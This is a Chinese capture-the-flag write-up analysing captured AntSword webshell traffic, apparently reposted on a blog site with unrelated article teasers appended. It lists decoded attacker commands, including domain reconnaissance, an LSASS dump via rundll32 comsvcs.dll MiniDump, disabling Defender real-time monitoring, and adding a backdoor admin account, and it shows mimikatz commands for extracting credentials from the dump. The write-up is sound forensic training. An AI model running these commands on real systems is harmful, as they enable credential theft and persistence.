玄机-第六章 流量特征分析-蚂蚁爱上树的测试报告

embedded/2025/3/27 15:43:33/

目录

一、测试环境

二、测试目的

三、操作过程

Flag1

Flag2

Flag3

四、结论


一、测试环境

靶场介绍:国内厂商设置的玄机靶场,以应急响应题目著名。

地址:https://xj.edisec.net/challenges/44

靶机简介:

二、测试目的

对附件数据包进行流量分析,按照题目要求找出对应的flag并提交。

三、操作过程

Flag1

进行流量分析,过滤http流量,发现product2.php是webshell流量

蚁剑使用的是base64加密,其中密文前两位是混淆字符,需要将每个包的命令执行语句进行解码,分析命令,找寻线索

所有命令解码如下:

C:/phpStudy/PHPTutorial/WWW/onlineshop/database/onlineshop.sql

cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&ls&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /priv&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&systeminfo&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain group” /domain&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net group “domain admins” /domain&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net view&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net share&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&ls&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”© store.php c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\temp&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&powershell -ep bypass Set-Mppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

C:/Temp/OnlineShopBack.zip

cd /d “C:/phpStudy/PHPTutorial/WWW/onlineshop”&dir c:\windows\system32&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&dir c:\windows\config&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net localgroup administrators admin /add&echo [S]&cd&echo [E]

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&whoami /all&echo [S]&cd&echo [E]

在length为4146的webshell流量包中,解码得到了创建admin账户的命令

解码得到密码:Password1

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&net user admin Password1 /add&echo [S]&cd&echo [E]

Flag1:flag{Password1}

Flag2

在length为4172的webshell流量包中,解码得到了LSASS.exe的程序进程id,这也是命令中唯一的id号

rundll32.exe 可用于执行 DLL 文件,也能调用该文件中的内部函数,这里就调用了comsvcs.dll中的MiniDump函数。

Comsvcs.dll的minidump函数可以创建内存转储文件,包含了系统内存的快照,可能包含敏感信息,攻击者使用这个函数获取身份验证信息。

而LSASS.exe进程,负责本地安全策略以及用户身份验证。经常成为攻击者的目标。因此这条命令正是调用该进程的命令,进程id是852

cd /d “C:\phpStudy\PHPTutorial\WWW\onlineshop”&rundll32.exe comsvcs.dll, MiniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]

Flag2:flag{852}

Flag3

根据对命令执行的分析,攻击者导出身份验证信息在文件:C:\temp\OnlineShopBackup.zip

可以将http流量包导出,分离出该文件。从最大的文件开始导出分析,导出为dmp文件

由于是蚁剑流量,文件头有多余字节,需要将文件头的e1c1709删除。删除后就是dmp文件的特征。(如果发现mimikatz没报错,也没读取成功,就重新导出,先保存为php文件,删除多余字符后保存为dmp文件试试)

 mimikatz的GitHub地址:https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.ziphttps://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip 使用mimikatz识别dmp文件,需要注意:mimikatz管理员权限启动;mimikatz的版本是2022,不然也解密不出;

sekurlsa::minidump mima.dmp
sekurlsa::logonpasswords

成功读取信息,win101的NTML:282d975e35846022476068ab5a3d72df

解密得到用户win101的密码:admin#123

Flag3:flag{admin#123}

四、结论

流量分析的操作有时候很枯燥,但是不可或缺。需要耐心完成工作,确保不遗漏信息。

熟悉了获取主机身份信息的命令,以及mimikatz工具的使用方法。

文章来源:https://blog.csdn.net/2301_79698171/article/details/146516168
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.ppmy.cn/embedded/176712.html

相关文章

基于 arco 的 React 和 Vue 设计系统

arco 是字节跳动出品的企业级设计系统,支持React 和 Vue。 安装模板工具 npm i -g arco-cli创建项目目录 cd someDir arco init hello-arco-pro? 请选择你希望使用的技术栈React❯ Vue? 请选择一个分类业务组件组件库Lerna Menorepo 项目❯ Arco Pro 项目看到以…

Apache SeaTunnel同步MySQL到Doris的优化策略

在数据仓库建设过程中,数据同步是一个关键环节。Apache SeaTunnel作为一个高性能的分布式数据集成工具,被广泛用于将MySQL数据同步到Doris等OLAP数据库。 然而,如何优化这个同步过程,提高效率并减少资源消耗,是每个数据…

C++11QT复习 (五)

文章目录 **Day6-2 成员访问运算符重载(2025.03.25)****1. 复习****2. 成员访问运算符重载****2.1 箭头运算符 (->) 重载****(1) 语法** **2.2 解引用运算符 (*) 重载****(1) 语法** **3. 代码分析****3.1 代码结构****3.2 代码解析****(1) Data 类**…

吾爱出品,文件分类助手,高效管理您的 PC 资源库

在日常使用电脑的过程中,文件杂乱无章常常让人感到困扰。无论是桌面堆积如山的快捷方式,还是硬盘中混乱的音频、视频、文档等资源,都急需一种高效的整理方法。文件分类助手应运而生,它是一款文件管理工具,能够快速、智…

Cmake创建一个QML

使用Qt Quick module.创建一个 QML demo cmake_minimum_required(VERSION 3.16)project(hello VERSION 1.0 LANGUAGES CXX)find_package(Qt6 6.3 COMPONENTS Quick Gui REQUIRED)qt_standard_project_setup(REQUIRES 6.5) set(CMAKE_CXX_STANDARD 17) set(CMAKE_CXX_STANDARD_…

基于Java的班级事务管理系统(源码+lw+部署文档+讲解),源码可白嫖!

摘要 随着世界经济信息化、全球化的到来和电子商务的飞速发展,推动了很多行业的改革。若想达到安全,快捷的目的,就需要拥有信息化的组织和管理模式,建立一套合理、畅通、高效的线上管理系统。当前的班级事务管理存在管理效率低下…

《K230 从熟悉到...》边缘检测

《K230 从熟悉到...》边缘检测 Candy简单的阈值高通滤波算法拉普拉斯核 《庐山派 K230 从熟悉到...》边缘检测 Canny和阈值高通滤波用的同一个API,只在参数中做区别。 Candy img.find_edges(image.EDGE_CANNY, threshold(50, 80))简单的阈值高通滤波算法 img.find…

VC++重绘CheckBox,方便直接可以用

记得关注! #include "stdafx.h" #include "CCheckSK.h" CCheckSK::CCheckSK() { m_bCheck = FALSE; m_bMouseOver = FALSE; m_nLedSize = 15; // set default color to green on ON and dark-green on OFF //m_colLedOn = RGB(0, 255, 0)…